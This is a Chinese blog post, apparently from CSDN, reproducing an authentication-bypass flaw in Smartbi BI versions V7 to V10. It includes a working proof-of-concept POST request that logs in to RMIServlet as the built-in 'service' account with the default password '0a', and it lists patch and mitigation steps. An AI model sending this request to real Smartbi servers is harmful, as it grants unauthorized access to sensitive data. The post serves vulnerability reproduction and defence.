Smartbi 身份认证绕过漏洞

最新推荐文章于 2024-05-20 08:42:55 发布
最新推荐文章于 2024-05-20 08:42:55 发布
阅读量535 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mafucan/article/details/131758795
版权

0x00 简介

Smartbi是广州思迈特软件有限公司旗下的商业智能BI和数据分析产品,致力于为企业客户提供一站式商业智能解决方案。

0x01 漏洞概述

Smartbi在安装时会内置三个用户(public、service、system),在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,未经身份验证的攻击者通过该漏洞可获取系统中敏感信息。

0x02 影响版本

V7 <= Smartbi <= V10
0x03漏洞复现
访问目标环境
在这里插入图片描述
poc如下

POST /smartbi/vision/RMIServlet
Host:
className=UserService&methodName=loginFromDB&params=["service","0a"]

GET请求报错,可能存在漏洞
在这里插入图片描述

POST请求,这里使用的是service,内置三个用户(public、service、system),口令都为0a
在这里插入图片描述
xpoc -r 105 -t 校验存在漏洞
在这里插入图片描述

0x04 修复方式

官方措施:
官方已发布修复方案,受影响的用户建议及时下载补丁包进行漏洞修复https://www.smartbi.com.cn/patchinfo
临时措施
在确认不影响业务的前提下,修改内置账号(public、service、system)的默认密文(默认值为0a),或者删除内置账号。非必要尽量不让服务部暴露在公网。

mafucan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 || Smartbi内置用户登陆绕过
失心少年
07-05 639
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。1.利用此POC出现如下情况则存在漏洞
Smartbi内置用户登陆绕过漏洞复现
0xSec
06-19 4486
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
smartbi token回调获取登录凭证漏洞(二)/smartbi token回调获取登录凭证漏洞(二)-入门攻防详细教程
最新发布
程序员六七的博客
05-20 275
2023年8月8日官方又修复了一处权限绕过漏洞。该漏洞是上一个特定场景下设置Token回调地址漏洞绕过,未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 694
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 458
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实现任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
SmartBI数据分析师认证
01-25
SmartBI数据分析师认证是一项针对专业人士的资格认证,旨在验证个人在使用SmartBI工具进行数据分析、数据可视化和商业智能方面的技能和知识。SmartBI是一款强大的商业智能软件,它提供了丰富的数据分析功能,包括...
Smartbi报表设置文档
03-20
Smartbi报表设置文档 Smartbi报表设置文档是指使用Smartbi工具创建报表时的设置文档,该文档提供了详细的报表设置步骤和相关知识点。 一、引用模板 在Excel中登录Smartbi,点击模板,打开模板。在模板上设计新...
SMARTBI连接服务器做文件上传操作
09-13
这可能涉及到SSL/TLS加密,以及API密钥或OAuth等身份验证机制,以防止未经授权的数据访问。 针对描述中的问题,当用户点击文件上传时意外下载了已存在的文件,这可能是由于前端代码的错误导致的。可能的原因包括: ...
smartbi破解文件
04-09
smartbi V7.02破解文件,以及可执行程序可单独联系。 smartbi V7.02破解文件,以及可执行程序可单独联系。
smartbi报表工程师笔试(部分题目及答案).docx
10-03
SmartBI报表工程师是负责利用SmartBI工具进行数据分析和报表制作的专业人员。在SmartBI的笔试中,涉及到的知识点主要集中在工具的功能和使用方法上,包括数据集的创建、电子表格的操作、数据源的管理以及报表的呈现...
smartbi使用
06-12
smart比使用
Smartbi:常见Web应用安全漏洞原理与防御介绍
思迈特Smartbi
06-15 767
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的普及,Web应用已经融入到我们生活中的方方面面。在企业信息化的过程中,越来越多的应用也都架设在Web平台上。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果技术人员的安全意识不足,例如对程序参数输入等检查不严格,就会导致Web应用安全问题层出不穷。轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这使得越来越多的用户关注应用层的安全
Smartbi 内置用户登陆绕过漏洞
whoami
08-02 455
Smartbi 大数据分析产品融合 BI 定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。Smartbi 在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。其中params用户可以为public service system其中一个。0a为默认密码的表示。
漏洞复现 || Smartbi 远程命令执行(1Day)
失心少年
07-06 2101
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
关于Smartbi登录代码逻辑漏洞的动态情报
zmcxyyds的博客
12-25 1416
关于Smartbi登录代码逻辑漏洞的动态情报
记一次Smartbi登录绕过
紫洋的博客
06-29 547
失败的话更改用户:system,public,service三个内置用户都尝试一遍。有下面的回显说明有可能存在漏洞(有些站点不行)发送请求后刷新登录后台页面就进来了。用Hackbar发送post请求。找到目标站点验证是否存在漏洞。域名后面拼接以下路径。
【高危】Smartbi 登录代码逻辑漏洞
murphysec的博客
07-24 324
Smartbi是一款企业级商业智能与大数据分析平台。由于Smartbi登录代码存在逻辑缺陷,攻击者可利用该漏洞登录管理员账号,进而利用系统后台加载扩展包功能执行任意代码。
smartbi 漏洞
02-02
SmartBI 智能商业智能系统是一个企业级的数据分析与决策支持平台。虽然SmartBI是一个功能强大、操作便捷的软件,但是在实际使用中可能存在一些漏洞。 首先,SmartBI可能存在数据泄露的漏洞。由于SmartBI涉及到企业的敏感数据以及商业机密,如果未能完善保护数据的安全性,可能导致数据被未授权的用户访问和窃取。 其次,SmartBI的系统架构可能存在漏洞,使得黑客可以通过攻击进行非法访问。如果系统安全管理不到位,黑客可能得以入侵系统,导致数据丢失或遭到破坏。 此外,SmartBI可能存在权限控制不完善的漏洞。如果没有正确设置用户权限,可能导致未经授权的用户获取到敏感数据,对数据进行篡改或破坏。 再者,SmartBI可能存在其他漏洞,例如软件的稳定性问题,导致系统崩溃或无法正常使用,或者在数据处理中可能存在一些计算逻辑的错误,导致分析和决策产生误导。 为了解决这些漏洞SmartBI的开发者和用户需要采取一系列措施。首先,确保系统安全管理措施完善,包括加强用户身份验证、建立完备的权限控制机制等。其次,加强数据加密与备份,确保数据安全性和可恢复性。此外,定期审计系统漏洞和进行安全测试,以及及时更新和升级系统以修复已知漏洞。最后,建立灾难恢复机制,以应对可能的系统故障和数据丢失情况。 总之,SmartBI作为一款强大的商业智能系统,在使用中确实可能存在一些漏洞,但是只要合理采取安全措施,可以最大程度地减少漏洞的风险,并确保系统的安全和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值